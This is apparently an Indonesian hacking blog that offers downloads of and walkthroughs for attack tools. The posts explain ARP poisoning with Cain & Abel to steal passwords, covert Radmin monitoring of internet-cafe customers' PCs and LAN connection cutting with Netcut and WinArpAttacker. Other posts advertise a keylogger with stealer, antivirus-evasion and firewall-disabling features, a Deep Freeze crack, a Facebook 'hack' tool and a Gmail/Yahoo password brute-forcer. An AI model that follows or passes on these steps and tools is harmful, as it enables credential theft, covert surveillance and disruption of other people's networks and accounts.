yup,dari percobaan diatas dapat diliat bahwa tools winarpattacker ini sangat berbahaya,karena dapat dengan mudahnya mematikan sistem jaringan yang kita bangun dengan susah payah.
Cara mengatasinya, dapat dengan mengunduh program anti sniffing atau anti winarpattacker yang sudah tersedia dengan mudah di google =p
percobaan diatas dilakukan dengan penuh tanggung jawab dan tanpa merugikan pihak lain.Apabila setelah dicoba kemudian tidak berhasil,berarti memang security jaringan tersebut sudah mumpuni =p.
Semua ini hanya untuk pembelajaran saja, jadi saya tidak bertanggung jawab apabila dikemudian hari ada pihak-pihak yang menyalahgunakan penggunaan penjelasan diatas

Download WinArpAttacker3.50.rar

Senin, 03 Mei 2010

Hack Warnet

memotong koneksi dalam jaringan LAN...
sbenarnya ni software sdh lama.. tp lupa upload ksini..
untuk pemakaian nya anda tinggal menginstal software tersebut.. setelah di install anda tinggal memilih ip mana yang akan di cut (cut off) atau memutuskan koneksinya..dan resume untuk mengembalikannya..jangan lupa komentarnya ya..
link download : http://www.4shared.com/file/235295779/6270ab7c/netcut_208.html

New Pirates Facebook

Download Link


1
= Protect My Account Facebook From Hack :


Protect yourself from hackers by this program,
So can not do any one by this program you can penetrate your account facebook

2 = Hack Facebook :

Is able to penetrate anyone who has an account in the facebook
Knowing the password + Email




Mediafire
Downlead link

Sql Injection Tools 2010

Web Hacking


Download: Hotfile

File Locker











Free File Locker Program ini adalah Project saya yang kemarin. Software ini merupakan aplikasi yang berfungsi untuk mengunci semua file yang ada di Windows. Seperti Dokumen Office (Word, Excell, Powerpoint, Access, Etc), Video (AVI, MPG, MP4, 3gp, WMV, etc), Audio (MP3),NOTEPAD dan Wordprad serta File Executable (EXE, DLL). Hampir seluruh file di Windows dapat di Lock “dikunci” dengan Aplikasi ini.
Tujuan utama dari File Locker ini untuk menjaga Privasi dari Pembajakan, karena aplikasi ini dibuat dengan C Sharp “C#” dan menggunakan Framework 2.0 maka untuk mengeksekusi program ini harus ter-instal
Framework 2.0

download : Framework 2.0
download : File Locker

Radmin 3.4 Remote Control











Disana nanti ada 2 buah file yaitu rserv30 dan rview30, untuk melihat client kita install rview30 dan untuk target kita install rserv30, btw langung install rview30 di depan computer kita, lihat hasil installan dibawah ini jalankan









Setelah Beres, kemudian beralih ke pc target install rserv30 di pc target , kemudian
jalankan software tersebut







Permission untuk melakukan setting password, yang berfungsi untuk memberikan keamanan kepada server kerennya mah orang biar ga tahu kalo buka radmin view ,







ada 2 security mode , Radmin security berbasis Win9x, dan Windows NT security
untuk berbasis Win2k [ Server NT ], btw kita setting yang umum aja , pakai radmin security , klik permissions












Isi nama dan password , terserah , kemudian klik OK, kemudian klik All access maka kita dapat melakukan control penuh terhadap target













Nah setelah kita selesai setting, maka kita coba melakukan koneksi ke pc target ckckckck









untuk mengetahui IP target anda dapat lakukan dengan cara melihat properti di My Network Places dengan klik kanan kemudian klik kanan Local Area Connection, lihat Internet Protocol [ TCP /IP ] ga susah , daripada make under DOS [ kan belajar simple dan praktis ] J.

Setelah dapat silakan anda tambahkan di dalam kolom RadminView add IP target kemudian klik ok [ akan nampak hasilnya seperti diatas ], trus anda tinggal arahkan mau diapakan tuh pc target bisa Full Control, ViewControl, Chatt, telnet, File transfer , Restat, ShutDown, Dll pokoknya ada semua J, nah untuk masuk ke pc target akan diminta password dan user [ ini user dan password yang tadi kita setting ] mengapa memakai password ? jawabannya simple agar orang lain selain bukan anda tidak bisa melihat –lihat pc yang kita remote tadi.
Dibawah ini merupakan hasil dari monitoring client di warnet gw.. ckckckck..up sorry hanya untuk percobaan saja, bukan untuk mematai2 akun atau password user saya..kita bisa lakukan remote untuk bermacam2 keperluan.



































Nah semua yang berhubungan dengan aktifitas mata – mematai membutuhkan port untuk bisa koneksi dari Server ke Client , untuk pemakaian default RADMIN menggunakan port 4899, nah untuk mematikan secara darurat bisa dengan menghidupkan firewall di pc target , maka akan otomatis port 4899 terblock yang menyebabkan koneksi dari server ke client mati [ remotenya tidak bisa hidup ]



















Download : Radmin 3.4

Sniffing Dengan Cain & Abel






Sniffing bisa disebut juga poisoning, apa itu? Untuk apa? Sebenarnya proses sniffing itu sendiri adalah proses pencurian password dengan cara melakukan poisoning terhadap komputer target melalui mac address komputer gateway, sehingga kita akan mencoba menipu komputer target agar percaya bahwa mac address komputer gateway adalah mac address komputer yang kita pakai. Jadi semua data yang dikirim komputer target akan melewati komputer kita terlebih dahulu. Dengan teknik ini, seorang user akan dapat dengan mudah mencuri username dan password, ftp, imap, pop3, http, https, telnet, vnc, tds, icq, mysql dan lain-lain bahkan situs yang aman sekalipun yang kebanyakan diawai dengan protocol https akan mudah di lacak username dan passwordnya.
kita jelaskan proses kerja dari Sniffing ini.
Apa yang diperlukan?

Pertama, Dude 3.6. Aplikasi ini berfungsi untuk memonitor jaringan, sekalian untuk melakukan komunikasi dengan seluruh jaringan yang ada.
Kedua, Cain & Abel, Oia untuk menginstal Dude 2.1 anda memerlukan satu software lagi agar Dude 2.1 ini bisa di instal yaitu .Net Framework 2.0 (yang kita pake) cari saja di www.downlaod.com masuk kotak search.. pasti ada. Setelah semua siap dan terinstall, jalankan Dude 2.1, kemudian discover Network dan program pun akan menampilkan komputer yang aktif saat itu lengkap dengan IP Address nya. Lalu jalankan Program Cain & Abel, Jangan lupa pilih Ethernet card yang dipakai pada bagian configure, start sniffer, klik tab sniffer pada bagian host disana terlihat beberapa komputer lengkap dengan alamat IP dan mac address nya, bingung, program cain tahu darimana? Program cain mengetahui alamat tersebut melalui komunikasi yang dilakukan oleh program Dude, sebenernya pake Ping juga bisa. Ato bisa juga dengan klik kanan pilih scan mac addres klik ok. Pada tab ABR bagian bawah, klik tanda tambah (+) pada baagian atas, pilih salah satu atau semua alamat IP address yang akan di poisoning, klik OK dan start APR. Setelah proses poisoning dijalankan, kita tinggal menunggu sampai program cain & abel menjalankan tugasnya, yah tunggu saja sambil chatting. Untuk melihat hasil kerja program cain tinggal klik APR ato Passwords pada bagian bawah. Ok deh, selamat menganalisa….Oia, postingan ini hanya bertujuan agar kita dapat mengetahui bagaimana proses pencurian password terjadi, dan tidak bertanggung jawab apabila disalahgunakan. PEACE
Info:
Pada saat melakukan tester di dalam warnet sendiri, sebagian pengunjung warnet protes kepada saya karna koneksi internet nya menjadi sangat lambat bahkan tidak terkoneksi sama sekali....!!
analisa saya program banyak menghabiskan bandwitc di salah satu jaringan yg disadap.
anda jangan pernah berfikir bahwa tehnik ini tidak akan bisa diketahui oleh orang lain, dilain waktu saya akan menjelaskan bagaimana cara untuk mencegah serangan ini, dan mencari tahu siapa pelakunya. Untuk itu berhati-hatilah anda jika melakukan aksi ini....!!

download : Cain & Abel
download : dude 3.6

Hack Komputer

Remote Komputer Menggunakan VNC (Virtual Network Computer)






Dulu sewaktu saya smu sktr tahun 2002, saya pernah bekerja sebagai operator warnet di kota manado. kebetulan bos saya selalu melarang user membuka website2 yang berisi porno. Apalagi kebanyakan user masih memakai seragam sekolah, karna warnet ini memang dekat dengan persekolahan (SMU 1 dan SMK 1) (e-life nama warnet tempat saya bekerja) sapa tau saja anda pembaca pernah berkunjung di warnet ini. xixixixixixixi, dengan modal sebagai operator warnet tentunya tiada hari tanpa online..(MiRC) dengan komunitas #bunaken salah satu room IRC dal.net saya banyak belajar..

Real VNC atau Virtual Network Computer akhirnya saya pakai untuk kebutuhan memonitor seluruh compi warnet sesuai perintah bos..
ada beberapa jenis VNC di antaranya Tight VNC dll.
dalam perkembangannya VNC ini terbagi dalam beberapa platform di antaranya Free, Enterprice dll.
oke sudah cukup saya berbasa-basi...
VNC adalah sebuah Software yang bersifat Open Source, Multi platform. kalau kawan2 blm mengtahui multi platform seperti apa, saya contohkan sekarang saya memakai OS Windows sebagai server..dan mengakses ke linux sebagai client sebaliknya juga bgtu. sudah ada pikiran multi platform apa.. saya anggap sudah. bisa juga di pakai ke OS lain.
VNC harus di instal ke komputer baik server (yg meremote) dan juga ke client (yg di remote).
Instalasi :
sebelumnya maaf saya tidak menampilkan imange/gambar..
Anda akan di pandu lewat menu wizard saat proses instal... klik saja next terus..(sewaktu instalasi anda akan di hadapkan dengan kotak2 kosong yg harus di centang.. saran saya agar mencentang semua kotak kosong saat proses instalasi.
di akhir instalasi anda akan di hadapkan dengan menu yang meminta anda untuk memberi password, klik set password dan masukan password.
setelah itu next dan finish.
Untuk meremote komputer lain sesuai dengan yang saya katakan di atas, anda harus melakukan instalasi ke komputer client juga (kalo anda ingin meremote 10 komputer, 10 komputer itu juga harus di instal VNC ini, seperti yang anda lakukan pada instalasi komputer yg pertama/server).
Sekarang kita coba untuk menghubungkan dengan komputer yang sudah anda instal VNC tersebut..
lihat desktop dan klik shortcut VNC viewer.. anda diminta untuk mengisi ip address komputer yang akan di remote bisa juga username komputer tersebut. klik ok dan muncul kotak kedua untuk mengisi password. ingat password yang di masukan adalah password komputer yang akan di remote.. maka dari itu sewaktu penginstalan ingat baik2 password yang anda masukan.
Software ini sudah saya gunakan sejak tahun 2005. karna ada request dari teman di group akhirnya saya memposting lagi penggunaan software ini.
Ingat untuk tidak menyalahgunakan artikel yang saya buat ini.
download : Real VNC 4.1

Keylogger new 2010

541's Keylogger v3.0:Free Highly Advanced Keylogger


So here,It is i released my v3.0 of my keylogger but I didn't release the previous version because i started this blog only after that.Any way i have fixed all the bugs of v1.0 and v2.0...So you can be quite sure of advanced keylogging after you download this !

So let me start off with the Screenshots....Seeing this you might be amazed ...I'm warning you.....Just kidding

Like all of "My Other Programs" it is coded in VB.NET so you will require .NET Framework 2.0 or later.

What Does it do ?

Its a keylogger what can you expect it to do ? It key logs information and I have added a littile stealer as well you can check out all the Function in its features !

Features:

1.Upload Logs to Gmail,Hotmail,AOL,Other...
2.FTP Upload .
3.Disables TaskManager
4.Disables CMD (Command Prompt)
5.Disables Registry
6.Add to StartUp + Copies itself as "Windows Update"
7.PC Info Stealer(Steals IP,Computer Name....)
8.Melt (Deletes Itself and Copies to the Windows System Folder !)
9.Disable Firewall
10.Fake Message + Test Message
11.Antis (Keyscrambler, Wireshark, Anubis, Malwarebytes, Kaspersky, Ollydbg, Outpost, Norman,Bit Defender, Nod32, Zone Alarm)
12.Icon Changer + Preview + In-Built Icons
13.Custom Log Interval
14.Change File Name (Please do not change the Filename externally !)
15.Add your own Extension other than the standard ".exe"
16.Cure.exe to remove "Virus" from your Computer
17.Website blocker(virustotal.com, scanner.novirusthanks.org, f-secure.com, kaspersky.com,bitdefender.com, eset.com, virusscan.jotti.org, home.mcafee.com, onlinescan.avast.com, viruschief.com,fortiguard.com)
18.Custom Website Blocker
19.FUD Downloader
20.FUD Pumper
21.Windows Product Key Stealer Win XP/Vista/7 and Office 2007
22.Logs all keys !@#$%^&*(){}|:"<>?,./;'[]\ and F1,f2,f3,f4,f5,f6,f7,f8,f9,f10,f11,f12, BackSpace

Note:This works on the Principle of "Hooks" so it works on all Windows OS (Windows XP,Windows Vista,Windows 7)


Screenshots:

1.Keylogger Builder

Keylogger
Keylogger
Keylogger
Keylogger
Keylogger
Keylogger
Keylogger
Keylogger
Keylogger
Keylogger


2.Sample Logs

Logs
Logs
Logs

3.Cure.exe

Logs

link download : http://www.ziddu.com/downloadlink/8841295/541sv3.0.rar.html

Anti Deepfreez

Jebol Deepfreez v6

Mungkin anda sudah banyak mengetahui dalam forum - forum hacker yang ada.. tapi bagaimana dengan yang belum tau...
Pada kesempatan kali ini, kita menggunakan tools yang bernama Uninstal Deep Freeze, bukan anti deep freeze. Fungsi tools ini sama kok, yaitu menjebol password deep freeze. Lumayan buat kalau di warnet,






















Cara Menggunakan nya :
Klik login, lalu tunggu sampai tombol crack aktif.
Kalau udah aktif, klik crack.
Tekan CTRL+Alt+Shift+F6 bersamaan.
Pilih Boot thawed. (Nggak usah masukan password)
Restart.
Download : 4shared

Software Hacking Facebook + Download

Reiluke Gmail/yahoomail bruter - hack e-mail



Reiluke Gmail/yahoomail bruter adalah sebuah tool kecil untuk melakukan brute force login Gmail dan Yahoomail. pengunaannya pun cukup sederhana. masukkan e-mail,tentukan file wordlist, klik start.

Metode crack e-mail dengan tool ini adalah login secara kasar, jadi mungkin saja IP address di-bann oleh mail server. dan anda perlu memiliki file wordlist yang lengkap untuk memperbesar kemungkinan sebuah mail dapat dibobol.

dan yang terakhir, tidak semua e-mail bisa dibobol dengan cara ini, tergantung kombinasi password. jadi jangan terlalu menaruh harapan pada tool ini untuk mendapatkan account e-mail orang lain.
Post by Poni
Download : Ziddu